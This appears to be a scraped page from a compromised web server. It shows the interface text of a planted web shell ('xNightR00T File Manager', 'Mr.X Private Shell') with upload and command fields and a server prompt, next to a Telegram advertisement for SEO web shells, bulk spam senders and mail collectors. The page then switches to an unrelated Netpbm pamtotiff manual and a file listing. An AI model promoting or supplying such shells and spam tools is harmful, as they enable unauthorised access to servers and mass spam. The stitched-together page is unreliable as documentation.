xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML><HEAD><TITLE>Pamtotiff User Manual</TITLE></HEAD>
<BODY>
<H1>pamtotiff</H1>
Updated: 17 April 2014
<BR>
<A HREF="#index">Table Of Contents</A>

<H2>NAME</H2>
pamtotiff - convert a Netpbm image to a TIFF file

<H2 id="synopsis">SYNOPSIS</H2>

<B>pamtotiff</B>

[<B>-none</B> | <B>-packbits</B> | <B>-lzw</B> | <B>-g3</B> | <B>-g4</B>
| <B>-flate</B> | <B>-adobeflate</B>]

[<B>-2d</B>]

[<B>-fill</B>]

[<B>-predictor=</B><I>n</I>]

[<B>-msb2lsb</B>|<B>-lsb2msb</B>]

[<B>-rowsperstrip=</B><I>n</I>]

[<B>-minisblack</B>|<B>-miniswhite</B>|<B>mb</B>|<b>mw</b>]

[<B>-truecolor</B>]

[<B>-color</B>]

[<B>-indexbits=</B><I>bitwidthlist</I>]

<br>
[<B>-xresolution=</b><i>xres</i>]

[<B>-yresolution=</b><i>yres</i>]

<br>
[<B>-resolutionunit=</b>{<b>inch</b> | <b>centimeter</b> | <b>none</b> |
<b>in</b> | <b>cm</b> | <b>no</b>}]

[<B>-indexbits=</b>[<b>1</b>[<b>2</b>[<b>4</b>[<b>8</b>]]]]]

[<b>-append</b>]

[<b>-tag=</b><i>taglist</i>]

[<I>pamfile</I>]

<P>You can use the minimum unique abbreviation of the options.  You
can use two hyphens instead of one.  You can separate an option name
from its value with white space instead of an equals sign.

<H2 id="description">DESCRIPTION</H2>

<p>This program is part of <a href="index.html">Netpbm</a>.

<p><b>pamtotiff</b> reads a PNM or PAM image as input and produces a TIFF file
as output.

<p>Actually, it handles multi-image Netpbm streams, producing multi-image
TIFF streams (i.e. a TIFF stream with multiple
&quot;directories&quot;).  But before Netpbm 10.27 (March 2005), it
ignored all but the first Netpbm image in the input stream.

<h3 id="output">The Output File</h3>

<P>By default, the output goes to Standard Output.  Alternatively, you can
specify an output file with the <b>-output</b> option and <b>pamtotiff</b>
will write its output directly to that file.

<p>Because of the way the TIFF library (which <b>pamtotiff</b> uses) works,
when the program writes to Standard Output, it generates the entire TIFF image
in a temporary file and then copies it to Standard Output; you may see
negative performance effects of this.

<p>The <b>-output</b> method avoids the performance effects of the copy
through the temporary file, but there are restrictions on the output file: it
must be seekable and it must be readable.  The program fails if it is not.
With Standard Output, neither of those restrictions applies.

<p>With <b>-output</b>, if the file already exists and has data in it,
<b>pamtotiff</b> appends the image to the existing TIFF file.  (A TIFF file
may contain multiple images).

<p>By default, <b>pamtotiff</b> creates the file named by <b>-output</b> if it
does not already exist.  But if you also specify <b>-append</b>, the program
fails if the file named by <b>-output</b> does not already exist.

<p>Before Netpbm 10.67 (June 2014), there is no <b>-output</b> option and
Standard Output must be seekable.  So pipes are out.

<p>Before Netpbm 10.67 (June 2014), you could append to Standard Output.  See
below.  The current program does not have the ability; you must
use <b>-output</b> to append to an existing TIFF file.

<p>The difference above means current <b>pamtotiff</b> is actually not
backward compatible, which is a rare thing for Netpbm.  But it's a good thing
because the previous function was very strange and probably hardly ever
exploited.


<h4 id="oldoutput">Old Versions</h4>

<p>As alluded to above, <b>pamtotiff</b> does output very differently
in releases before 10.67.  The following describes the old function,
which is unusual both for Netpbm and for Unix programs in general.

<ul>
<li>The output file must be seekable.  <b>pamtotiff</b> does not
write it sequentially.  Therefore, you can't use a pipe; you can't
pipe the output of <b>pamtotiff</b> to some other program.  But any
regular file should work.

<li>If the output file descriptor is readable, you must either specify
<b>-append</b> so as to add to the existing file, or make sure the
file is empty.  Otherwise, <b>pamtotiff</b> will fail with an
unhelpful message telling you that a TIFF library function failed to
open the TIFF output stream.

<li>If you are converting multiple images (your input stream contains
multiple images), the output file must be both readable and writable.

</ul>

<p>If you're using a Unix command shell to run <b>pamtotiff</b>, you
use facilities of your shell to set up Standard Output.  In Bash,
for example, you would set up a write-only Standard Output to the
file /tmp/myimage.tiff like this:

<pre>
<tt>
    $ pamtotiff myimage.pnm &gt;/tmp/myimage.tiff
</tt>
</pre>

In Bash, you would set up a read/write Standard Output to the file
/tmp/myimage.tiff like this:

<pre>
<tt>
    $ pamtotiff myimage.pnm 1&lt;&gt;/tmp/myimage.tiff
</tt>
</pre>

<h3 id="library">TIFF Capability</h3>

<p><b>pamtotiff</b> uses the Libtiff.org TIFF library (or whatever
equivalent you provide) to generate the TIFF output.  Details of the
format it produces are therefore controlled by that library.

<H2 id="options">OPTIONS</H2>

<h3 id="compression">Compression</h3>

<P>By default, <B>pamtotiff</B> creates a TIFF file with no
compression.  This is your best bet most of the time.  If you want to
try another compression scheme or tweak some of the other even more
obscure output options, there are a number of options which to
play.

<p>Before Netpbm 8.4 (April 2000), the default was to use LZW compression.
But then new releases of the TIFF library started omitting the LZW
compression capability because of concern about patents on LZW.  So
since then, the default has been no compression.  The LZW patents have
now expired and new TIFF libraries do LZW, but the <b>pamtotiff</b>
behavior remains the same for compatibility with older TIFF libraries
and applications of <b>pamtotiff</b>.

<P>The <B>-none</B>, <B>-packbits</B>, <B>-lzw</B>, <B>-g3</B>,
<B>-g4</B>, <B>-flate</B>, and <B>-adobeflate</B> options are used to
override the default and set the compression scheme used in creating
the output file.

The <B>-predictor</B> option is meaningful only with LZW compression: a
predictor value of 2 causes each scanline of the output image to undergo
horizontal differencing before it is encoded; a value of 1 forces each
scanline to be encoded without differencing.  By default, <B>pamtotiff</B>
creates a TIFF file with msb-to-lsb fill order.  The <B>-msb2lsb</B> and
<B>-lsb2msb</B> options are used to override the default and set the fill
order used in creating the file.

<P>With some older TIFF libraries, <B>-lzw</B> doesn't work because
the TIFF library doesn't do LZW compression.  This is because of
concerns about Unisys's patent on LZW which was then in force.
Actually, with very old TIFF libraries, <b>-lzw</b> works because no
distributors of the TIFF library were sensitive yet to the patent
issue.

<p><b>-flate</b> chooses &quot;flate&quot; compression, which is the
patent-free compression common in the Unix world implemented by the 
&quot;Z&quot; library.  It is what the PNG format uses.

<H4 id="faxcompression">Fax Compression</H4>

<p>If you have bilevel data (e.g. PBM), you can generate a TIFF that uses the
same compression scheme specified for use by fax machines.  See the <a
href="faxformat.html">Fax Format</a> page for more information on these
compression schemes.

<p>These formats all relate to ITU Group 3 and Group 4 fax machine
standards.

<p>The <b>-g3</b> option chooses MH or MR compression: MR with the additional
option <b>-2d</b>; MH without it.  <b>-g4</b> selects MMR.  The option names
are a little unfortunate and historical, but are consistent with the TIFF
specification.

<p>MMR has a better compression ratio than the other two.

<p><b>-fill</b> specifies that for MH or MR compression, each encoded scanline
shall be zero-filled to a byte boundary.

<p><b>-2d</b> and <b>-fill</b> are meaningful only with <b>-g3</b>.


<h3 id="fillorder">Fill Order</h3>
<p>The <b>-msb2lsb</b> and <b>lsb2msb</b> options control the fill order.

<P>The fill order is the order in which pixels are packed into a byte in
the Tiff raster, in the case that there are multiple pixels per byte.
msb-to-lsb means that the leftmost columns go into the most
significant bits of the byte in the Tiff image.  However, there is
considerable confusion about the meaning of fill order.  Some believe
it means whether 16 bit sample values in the Tiff image are
little-endian or big-endian.  This is totally erroneous (The
endianness of integers in a Tiff image is designated by the image's
magic number).  However, ImageMagick and older Netpbm both have been known
to implement that interpretation.  2001.09.06.

<P>If the image does not have sub-byte pixels, these options have no
effect other than to set the value of the FILLORDER tag in the Tiff
image (which may be useful for those programs that misinterpret the
tag with reference to 16 bit samples).

<h3 id="colorspace">Color Space</h3>

<P><B>-color</B> tells <B>pamtotiff</B> to produce a color, as
opposed to grayscale, TIFF image if the input is PPM, even if it
contains only shades of gray.  Without this option, <B>pamtotiff</B>
produces a grayscale TIFF image if the input is PPM and contains only
shades of gray, and at most 256 shades.  Otherwise, it produces a
color TIFF output.  For PBM and PGM input, <B>pamtotiff</B> always
produces grayscale TIFF output and this option has no effect.

<P>The <B>-color</B> option can prevent <B>pamtotiff</B> from making
two passes through the input file, thus improving speed and memory
usage.  See <a href="#multipass">Multiple Passes</a>.

<P><B>-truecolor</B> tells <B>pamtotiff</B> to produce the 24-bit RGB
form of TIFF output if it is producing a color TIFF image.  Without
this option, <B>pamtotiff</B> produces a colormapped (paletted) TIFF
image unless there are more than 256 colors (and in the latter case,
issues a warning).

<P>The <B>-truecolor</B> option can prevent <B>pamtotiff</B> from
making two passes through the input file, thus improving speed and
memory usage.  See <a href="#multipass">Multiple Passes</a>.

<P>The <B>-color</b> and <b>-truecolor</b> options did not exist
before Netpbm 9.21 (December 2001).

<P>If <B>pamtotiff</B> produces a grayscale TIFF image, this option
has no effect.

<P>The <B>-minisblack</B> and <B>-miniswhite</B> options force the
output image to have a &quot;minimum is black&quot; or &quot;minimum
is white&quot; photometric, respectively.  If you don't specify
either, <B>pamtotiff</b> uses minimum is black except when using Group
3 or Group 4 compression, in which case <B>pamtotiff</B> follows CCITT
fax standards and uses &quot;minimum is white.&quot; This usually
results in better compression and is generally preferred for bilevel
coding.

<P>Before February 2001, <B>pamtotiff</B> always produced
&quot;minimum is black,&quot; because of a bug.  In either case,
<B>pamtotiff</B> sets the photometric interpretation tag in the TIFF
output according to which photometric is actually used.

<P>The <B>-indexbits</B> option is meaningful only for a colormapped
(paletted) image.  In this kind of image, the raster contains values
which are indexes into a table of colors, with the indexes normally
taking less space that the color description in the table.
<B>pamtotiff</B> can generate indexes of 1, 2, 4, or 8 bits.  By
default, it will use 8, because many programs that interpret TIFF
images can't handle any other width.

<P>But if you have a small number of colors, you can make your image
considerably smaller by allowing fewer than 8 bits per index, using the
<B>-indexbits</B> option.  The value is a comma-separated list of the
bit widths you allow.  <B>pamtotiff</B> chooses the smallest width you allow
that allows it to index the entire color table.  If you don't allow any
such width, <B>pamtotiff</B> fails.  Normally, the only useful value for
this option is <B>1,2,4,8</B>, because a program either understands the 8
bit width (default) or understands them all.

<P>In a Baseline TIFF image, according to the 1992 TIFF 6.0
specification, 4 and 8 are the only valid widths.  There are no formal
standards that allow any other values.

<P>This option was added in June 2002.  Before that, only 8 bit indices were
possible.

<h3 id="extratags">Extra Tags</h3>

<p>There are lots of tag types in the TIFF format that don't correspond to
any information in the PNM format or to anything in the conversion process.
For example, a TIFF_ARTIST tag names the artist who created the image.

<p>You can tell <b>pamtotiff</b> explicitly to include tags such as this
in its output with the <b>-tag</b> option.  You identify a list of tag
types and values and <b>pamtotiff</b> includes a tag in the output for
each item in your list.

<p>The value of <b>-tag</b> is the list of tags, like this example:

<pre>
<code>
    -tag=subfiletype=reducedimage,documentname=Fred,xposition=25
</code>
</pre>

<p>As you see, it is a list of tag specifications separated by commas.
Each tag specification is a name and a value separated by an equal
sign.  The name is the name of the tag type, except in arbitrary
upper/lower case.  One place to see the names of TIFF tag types is in
the TIFF library's <b>tiff.h</b> file, where there is a macro defined
for each consisting of &quot;TIFF_&quot; plus the name.  E.g. for
the SUBFILETYPE tag type, there is a macro TIFF_SUBFILETYPE.

<p>The format of the value specification for a tag (stuff after the
equal sign) depends upon what kind of value the tag type has:

<ul>
<li>Integer: a decimal number

<li>Floating point number: a decimal number

<li>String: a string

<li>Enumerated (For example, a 'subfiletype' tag takes an enumerated
value.  Its possible values are REDUCEDIMAGE, PAGE, and MASK.): The
name of the value.  You can see the possible value names in the TIFF
library's <b>tiff.h</b> file, where there is a macro defined for each
consisting of a qualifier plus the value name.  E.g. for the
REDUCEDIMAGE value of a SUBFILETYPE tag, you see the macro
FILETYPE_REDUCEDIMAGE.

<p>The TIFF format assigns a unique number to each enumerated value and
you can specify that number, in decimal, as an alternative.  This is useful
if you are using an extension of TIFF that <b>pamtotiff</b> doesn't
know about.

</ul>

<p>If you specify a tag type with <b>-tag</b> that is not independent
of the content of your PNM source image and <b>pamtotiff</b>'s
conversion process (i.e. a tag type in which <b>pamtotiff</b> is
interested), <b>pamtotiff</b> fails.  For example, you cannot specify
an IMAGEWIDTH tag with <b>-tag</b>, because <b>pamtotiff</b> generates
an IMAGEWIDTH tag that gives the actual width of the image.

<p><b>-tag</b> was new in Netpbm 10.31 (December 2005).

<h3 id="outputoptions">Output</h3>

<p>See <a href="output">The Output File</a>.

<p><b>-output</b> names the output file.  Without this option
<b>pamtotiff</b> writes to Standard Output.

<p>The <b>-append</b> option tells <b>pamtotiff</b> only to append to the file
named by <b>output</b>; not create it.  Without this option, the program
creates the file it does not already exist.  But even then, if the file does
already exist, the program appends the image to what is in the file already.
(A TIFF file may contain multiple images).

<p><b>-append</b> has no effect if you don't also specify <b>-output</b>.

<p>Before Netpbm 10.67 (June 2014), <b>-append</b> means something rather
different: it means to append the image to the output TIFF file (which is
always Standard Output in 10.67) instead of replacing its contents.

<p><b>-append</b> was new in Netpbm 10.27 (March 2005).



<h3 id="other">Other</h3>

<P>You can use the <B>-rowsperstrip</B> option to set the number of
rows (scanlines) in each strip of data in the output file.  By
default, the output file has the number of rows per strip set to a
value that will ensure each strip is no more than 8 kilobytes long.


<H2 id="notes">NOTES</H2>

<P>There are myriad variations of the TIFF format, and this program
generates only a few of them.  <B>pamtotiff</B> creates a grayscale
TIFF file if its input is a PBM (monochrome) or PGM (grayscale) or
equivalent PAM file.  <B>pamtotiff</B> also creates a grayscale file
if it input is PPM (color) or equivalent PAM, but there is only one
color in the image.

<p>If the input is a PPM (color) file and there are 256 colors or
fewer, but more than 1, <B>pamtotiff</B> generates a color palette
TIFF file.  If there are more colors than that, <B>pamtotiff</B>
generates an RGB (not RGBA) single plane TIFF file.  Use
<B>pnmtotiffcmyk</B> to generate the cyan-magenta-yellow-black ink
color separation TIFF format.

<P>The number of bits per sample in the TIFF output is determined by
the maxval of the Netpbm input.  If the maxval is less than 256, the bits
per sample in the output is the smallest number that can encode the
maxval.  If the maxval is greater than or equal to 256, there are 16
bits per sample in the output.

<h3 id="extrachannel">Extra Channels</h3>

<p>Like most Netpbm programs, <b>pamtotiff</b>'s function is mostly
undefined if the input is PAM image with tuple type other than
BLACKANDWHITE, GRAYSCALE, or RGB.  Most of the statements in this manual
assume the input is not such an exotic PAM.  But there is a little
defined processing of other PAM subformats.

<p><b>pamtotiff</b> assumes any 1 plane PAM image is BLACKANDWHITE
or GRAYSCALE (and doesn't distinguish between those two).

<p><b>pamtotiff</b> assumes a PAM with more than 1 plane is of tuple
type RGB except with that number of planes instead of 3.
<b>pamtotiff</b> doesn't really understand red, green, and blue, so it
has no trouble with a 2-component or 5-component color space.  The
TIFF format allows an arbitrary number of color components, so
<b>pamtotiff</b> simply maps the PAM planes directly to TIFF color
components.  I don't know if the meanings of 5 components in a TIFF image
are standard at all, but the function is there if you want to use it.

<p>Note that <b>pamtotiff</b> may generate either a truecolor or
colormapped image with an arbitrary number of color components.  In
the truecolor case, the raster has that number of planes.  In the
colormapped case, the raster has of course 1 plane, but the color map
has all the color components in it.

<p>The most common reason for a PAM to have extra planes is when the tuple
type is xxx_ALPHA, which means the highest numbered plane is a transparency
plane (alpha channel).  At least one user found that a TIFF with an extra
plane for transparency was useful.

<p>Note that the grayscale detection works on N-component colors, so if
your planes aren't really color components, you'll want to disable this
via the <b>-color</b> option.


<H3 id="multipass">Multiple Passes</H3>

<P><B>pamtotiff</B> reads the input image once if it can, and
otherwise twice.  It needs that second pass (which happens before the
main pass, of course) to analyze the colors in the image and generate
a color map (palette) and determine if the image is grayscale.  So the
second pass happens only when the input is PPM.  And you can avoid it
then by specifying both the <B>-truecolor</B> and <B>-color</B>
options.

<P> If the input image is small enough to fit in your system's file
cache, the second pass is very fast.  If not, it requires reading from
disk twice, which can be slow.

<P>When the input is from a file that cannot be rewound and reread,
<B>pamtotiff</B> reads the entire input image into a temporary file
which can, and works from that.  Even if it needs only one pass.

<P>Before Netpbm 9.21 (December 2001), <b>pamtotiff</b> always read
the entire image into virtual memory and then did one, two, or three
passes through the memory copy.  The <b>-truecolor</b> and
<b>-color</b> options did not exist.  The passes through memory would
involve page faults if the entire image did not fit into real memory.
The image in memory required considerably more memory (12 bytes per
pixel) than the cached file version of the image would.


<h3>Resolution</h3>

<p>A Tiff image may contain information about the resolution of the image,
which means how big in real dimensions (centimeters, etc.) each pixel in the
raster is.  That information is in the TIFF XRESOLUTION, YRESOLUTION,
and RESOLUTIONUNIT tags.  By default, <b>pamtotiff</b> does not include
any tags of these types, but you can specify them with the <b>-tags</b>
option.

<p>There are also options <b>-xresolution</b>, <b>-yresolution</b>,
and <b>-resolutionunit</b>, but those are obsolete.  Before <b>-tags</b>
existed (before Netpbm 10.31 (December 2005), they were the only way.

<p>Note that the number of pixels in the image and how much information
each contains is determined independently from the setting of the
resolution tags.  The number of pixels in the output is the same as in
the input, and each pixel contains the same information.  For your
resolution tags to be meaningful, they have to consistent with
whatever created the PNM input.  E.g. if a scanner turned a 10 centimeter
wide image into a 1000 pixel wide PNM image, then your horizontal
resolution is 100 pixels per centimeter, and if your XRESOLUTION
tag says anything else, something that prints your TIFF image won't
print the proper 10 centimeter image.

<p>The value of the XRESOLUTION tag is a floating point decimal number
that tells how many pixels there are per unit of distance in the
horizontal direction.  <b>-yresolution</b> is analogous for the
vertical direction.

<p>The unit of distance is given by the value of the RESOLUTIONUNIT
option.  That value is either INCH, CENTIMETER, or NONE.  NONE
means the unit is arbitrary or unspecified.  This could mean that the
creator and user of the image have a separate agreement as to what the
unit is.  But usually, it just means that the horizontal and vertical
resolution values cannot be used for anything except to determine
aspect ratio (because even though the unit is arbitrary or
unspecified, it has to be the same for both resolution numbers).

<p>If you <em>don't</em> use a <b>-tag</b> option to specify the
resolution tag and use the obsolete options instead, note the
following:

<ul>
<li>If you don't include an specify <b>-xresolution</b>, the Tiff image
does not contain horizontal resolution information.  Likewise for
<b>-yresolution</b>.  If you don't specify <b>-resolutionunit</b>, the
default is inches.

<li>Before Netpbm 10.16 (June 2003), <B>-resolutionunit</b> did not
exist and the resolution unit was always inches.

</ul>

<h2 id="history">HISTORY</h2>

<p><b>pamtotiff</b> was originally <b>pnmtotiff</b> and did not handle
PAM input.  It was extended and renamed in Netpbm 10.30 (October 2005).


<H2 id="seealso">SEE ALSO</H2>

<B><A HREF="tifftopnm.html">tifftopnm</A></B>,

<B><A HREF="pnmtotiffcmyk.html">pnmtotiffcmyk</A></B>,

<B><A HREF="pamdepth.html">pamdepth</A></B>,

<B><A HREF="pamtopnm.html">pamtopnm</A></B>,

<B><A HREF="pam.html">pam</A></B>

<H2 id="author">AUTHOR</H2>

Derived by Jef Poskanzer from ras2tiff.c, which is
Copyright (c) 1990 by Sun Microsystems, Inc.
Author: Patrick J. Naughton (<A HREF="mailto:naughton@wind.sun.com">naughton@wind.sun.com</A>).

<HR>
<H2 id="index">Table Of Contents</H2>
<UL>
<LI><A HREF="#synopsis">SYNOPSIS</A>
<LI><A HREF="#description">DESCRIPTION</A>
  <ul>
  <li><a href="#output">The Output File</a>
  <ul>
    <li><a href="#oldoutput">Old Versions</a>
    </ul>
  <li><a href="#library">TIFF Capability</a>
  </ul>
<LI><A HREF="#options">OPTIONS</A>
  <ul>
  <li><a href="#compression">Compression</a>
    <ul>
    <li><a href="#faxcompression">Fax Compression</a>
    </ul>
  <li><a href="#fillorder">Fill Order</a>
  <li><a href="#colorspacer">Color Space</a>
  <li><a href="#extratags">Extra Tags</a>
  <li><a href="#outputoptions">Output</a>
  <li><a href="#other">Other</a>
  </ul>
<LI><A HREF="#notes">NOTES</A>
<UL>
<LI><A HREF="#multipass">Multiple Passes</A>
<LI><A HREF="#extrachannel">Extra Channels</A>
</UL>
<LI><A HREF="#history">HISTORY</A>
<LI><A HREF="#seealso">SEE ALSO</A>
<LI><A HREF="#author">AUTHOR</A>
</UL>
</BODY>
</HTML>

Filemanager

Name Type Size Permission Actions
411toppm.html File 1.76 KB 0644
anytopnm.html File 2.56 KB 0644
asciitopgm.html File 2.98 KB 0644
atktopbm.html File 945 B 0644
avstopam.html File 1.41 KB 0644
bioradtopgm.html File 1.43 KB 0644
blend1.gif File 18.25 KB 0644
blend3.gif File 21.23 KB 0644
blend4.gif File 24.56 KB 0644
blend6.gif File 21.87 KB 0644
blend7.gif File 26.28 KB 0644
bmptopnm.html File 2.16 KB 0644
bmptoppm.html File 562 B 0644
brushtopbm.html File 953 B 0644
cameratopam.html File 5.21 KB 0644
cistopbm.html File 1.36 KB 0644
cmuwmtopbm.html File 945 B 0644
ddbugtopbm.html File 3.22 KB 0644
directory.html File 34.32 KB 0644
escp2topbm.html File 2.21 KB 0644
extendedopacity.html File 6.7 KB 0644
eyuvtoppm.html File 1.1 KB 0644
faxformat.html File 3.66 KB 0644
fiascotopnm.html File 6.19 KB 0644
fitstopnm.html File 3.64 KB 0644
fstopgm.html File 1.95 KB 0644
g3topbm.html File 4.95 KB 0644
gemtopbm.html File 512 B 0644
gemtopnm.html File 1.38 KB 0644
giftopnm.html File 7.65 KB 0644
globe.jpg File 14.04 KB 0644
gobot.gif File 1.37 KB 0644
gouldtoppm.html File 911 B 0644
hdifftopam.html File 1.5 KB 0644
hipstopgm.html File 1.03 KB 0644
hpcdtoppm.html File 11.18 KB 0644
icontopbm.html File 1.2 KB 0644
ilbmtoppm.html File 3.29 KB 0644
imgtoppm.html File 1.03 KB 0644
index.html File 43.78 KB 0644
infotopam.html File 6.52 KB 0644
jbigtopnm.html File 3.91 KB 0644
jpeg2ktopam.html File 5.3 KB 0644
jpegtopnm.html File 12.51 KB 0644
leaftoppm.html File 1.1 KB 0644
liberror.html File 8.46 KB 0644
libmaketmpfile.html File 2.43 KB 0644
libmaketmpfilefd.html File 1.72 KB 0644
libnetpbm.html File 3.55 KB 0644
libnetpbm_dir.html File 9.03 KB 0644
libnetpbm_draw.html File 4.22 KB 0644
libnetpbm_image.html File 23.35 KB 0644
libnetpbm_ug.html File 11.12 KB 0644
libpbm.html File 9.43 KB 0644
libpgm.html File 7.71 KB 0644
libpm.html File 16.81 KB 0644
libpnm.html File 9.94 KB 0644
libppm.html File 26.71 KB 0644
libsystem.html File 14.36 KB 0644
libtmpfile.html File 1.71 KB 0644
libtmpfilefd.html File 1.3 KB 0644
lispmtopgm.html File 1.94 KB 0644
macptopbm.html File 1.87 KB 0644
mdatopbm.html File 1.61 KB 0644
mgrtopbm.html File 1.03 KB 0644
mrf.html File 4.3 KB 0644
mrftopbm.html File 1.54 KB 0644
mtvtoppm.html File 1.04 KB 0644
neotoppm.html File 1.18 KB 0644
palmtopnm.html File 3.54 KB 0644
pam.html File 12.22 KB 0644
pamaddnoise.html File 3.96 KB 0644
pamarith.html File 10.92 KB 0644
pambackground.html File 4.85 KB 0644
pambayer.html File 3.54 KB 0644
pamchannel.html File 2.7 KB 0644
pamcomp.html File 14.3 KB 0644
pamcut.html File 6.69 KB 0644
pamdeinterlace.html File 2.52 KB 0644
pamdepth.html File 2.47 KB 0644
pamdice.html File 4.52 KB 0644
pamditherbw.html File 6.62 KB 0644
pamedge.html File 2.24 KB 0644
pamendian.html File 2.55 KB 0644
pamenlarge.html File 3.22 KB 0644
pamexec.html File 3.15 KB 0644
pamfile.html File 2.93 KB 0644
pamfix.html File 4.7 KB 0644
pamfixtrunc.html File 1.51 KB 0644
pamflip.html File 8.43 KB 0644
pamfunc.html File 11.29 KB 0644
pamgauss.html File 3.7 KB 0644
pamgradient.html File 2.92 KB 0644
pamlookup.html File 9.54 KB 0644
pammasksharpen.html File 4.62 KB 0644
pammixinterlace.html File 3.1 KB 0644
pammosaicknit.html File 3.23 KB 0644
pamoil.html File 2.36 KB 0644
pampaintspill.html File 5.21 KB 0644
pamperspective.html File 17.28 KB 0644
pampick.html File 2.35 KB 0644
pampop9.html File 2.4 KB 0644
pamrecolor.html File 8.69 KB 0644
pamrgbatopng.html File 2.26 KB 0644
pamrubber.html File 6.43 KB 0644
pamscale.html File 25.42 KB 0644
pamseq.html File 2.77 KB 0644
pamsharpmap.html File 2.38 KB 0644
pamsharpness.html File 1.77 KB 0644
pamsistoaglyph.html File 6.65 KB 0644
pamslice.html File 4.06 KB 0644
pamsplit.html File 2.93 KB 0644
pamstack.html File 3.41 KB 0644
pamstereogram.html File 16.52 KB 0644
pamstretch-gen.html File 1.62 KB 0644
pamstretch.html File 3.72 KB 0644
pamsumm.html File 3.72 KB 0644
pamsummcol.html File 4.1 KB 0644
pamthreshold.html File 6.42 KB 0644
pamtilt.html File 4.53 KB 0644
pamtoavs.html File 1.8 KB 0644
pamtodjvurle.html File 1.78 KB 0644
pamtofits.html File 3.94 KB 0644
pamtogif.html File 13.13 KB 0644
pamtohdiff.html File 3.32 KB 0644
pamtohtmltbl.html File 2.71 KB 0644
pamtojpeg2k.html File 9.38 KB 0644
pamtompfont.html File 2.07 KB 0644
pamtooctaveimg.html File 3.21 KB 0644
pamtopam.html File 1.67 KB 0644
pamtopdbimg.html File 2.6 KB 0644
pamtopfm.html File 3.1 KB 0644
pamtopnm.html File 3.22 KB 0644
pamtosrf.html File 2.68 KB 0644
pamtosvg.html File 7.07 KB 0644
pamtotga.html File 4.42 KB 0644
pamtotiff.html File 23.6 KB 0644
pamtouil.html File 2.5 KB 0644
pamtowinicon.html File 5.02 KB 0644
pamtoxvmini.html File 1.09 KB 0644
pamundice.html File 6.94 KB 0644
pamvalidate.html File 2.19 KB 0644
pamwipeout.html File 3.08 KB 0644
pamx.html File 8.25 KB 0644
pbm.html File 6.58 KB 0644
pbmclean.html File 5.12 KB 0644
pbmlife.html File 1 KB 0644
pbmmake.html File 1.32 KB 0644
pbmmask.html File 2.89 KB 0644
pbmminkowski.html File 529 B 0644
pbmpage.html File 2.75 KB 0644
pbmpscale.html File 1.74 KB 0644
pbmreduce.html File 2.29 KB 0644
pbmtext.html File 13.69 KB 0644
pbmtextps.html File 3.46 KB 0644
pbmto10x.html File 1.37 KB 0644
pbmto4425.html File 1.75 KB 0644
pbmtoascii.html File 1.92 KB 0644
pbmtoatk.html File 934 B 0644
pbmtobbnbg.html File 1.32 KB 0644
pbmtocis.html File 1.49 KB 0644
pbmtocmuwm.html File 1.03 KB 0644
pbmtodjvurle.html File 1.18 KB 0644
pbmtoepsi.html File 3.24 KB 0644
pbmtoepson.html File 3.11 KB 0644
pbmtoescp2.html File 3.94 KB 0644
pbmtog3.html File 2.24 KB 0644
pbmtogem.html File 1.16 KB 0644
pbmtogo.html File 1.24 KB 0644
pbmtoibm23xx.html File 2.31 KB 0644
pbmtoicon.html File 1.2 KB 0644
pbmtolj.html File 3.34 KB 0644
pbmtoln03.html File 1.45 KB 0644
pbmtolps.html File 1.48 KB 0644
pbmtomacp.html File 1.81 KB 0644
pbmtomda.html File 1.75 KB 0644
pbmtomgr.html File 1.03 KB 0644
pbmtomrf.html File 1.4 KB 0644
pbmtonokia.html File 3.28 KB 0644
pbmtopgm.html File 2.47 KB 0644
pbmtopi3.html File 1.11 KB 0644
pbmtopk.html File 4.3 KB 0644
pbmtoplot.html File 1.06 KB 0644
pbmtoppa.html File 9.66 KB 0644
pbmtopsg3.html File 1.8 KB 0644
pbmtoptx.html File 1.05 KB 0644
pbmtosunicon.html File 1.02 KB 0644
pbmtowbmp.html File 1.32 KB 0644
pbmtox10bm.html File 759 B 0644
pbmtoxbm.html File 1.49 KB 0644
pbmtoybm.html File 1.13 KB 0644
pbmtozinc.html File 1.11 KB 0644
pbmupc.html File 1.91 KB 0644
pc1toppm.html File 1.13 KB 0644
pcdovtoppm.html File 2.32 KB 0644
pcxtoppm.html File 2.27 KB 0644
pdbimgtopam.html File 1.78 KB 0644
pfm.html File 3.28 KB 0644
pfmtopam.html File 1.89 KB 0644
pgm.html File 7.65 KB 0644
pgmabel.html File 3.27 KB 0644
pgmbentley.html File 1.14 KB 0644
pgmcrater.html File 7.02 KB 0644
pgmdeshadow.html File 1.89 KB 0644
pgmedge.html File 504 B 0644
pgmenhance.html File 1.53 KB 0644
pgmhist.html File 4.41 KB 0644
pgmkernel.html File 3.48 KB 0644
pgmmake.html File 1.72 KB 0644
pgmmedian.html File 3.62 KB 0644
pgmminkowski.html File 3.48 KB 0644
pgmmorphconv.html File 3.87 KB 0644
pgmnoise.html File 2 KB 0644
pgmnorm.html File 504 B 0644
pgmoil.html File 492 B 0644
pgmramp.html File 3.24 KB 0644
pgmslice.html File 478 B 0644
pgmtexture.html File 1.98 KB 0644
pgmtofs.html File 1.08 KB 0644
pgmtolispm.html File 1.81 KB 0644
pgmtopbm.html File 1.69 KB 0644
pgmtopgm.html File 1.64 KB 0644
pgmtoppm.html File 4.08 KB 0644
pi1toppm.html File 1.17 KB 0644
pi3topbm.html File 1.12 KB 0644
picttoppm.html File 5.25 KB 0644
pjtoppm.html File 1.27 KB 0644
pktopbm.html File 2.04 KB 0644
pngtopam.html File 12.06 KB 0644
pngtopnm.html File 1.87 KB 0644
pnm.html File 2.65 KB 0644
pnmalias.html File 2.81 KB 0644
pnmarith.html File 752 B 0644
pnmcat.html File 2.85 KB 0644
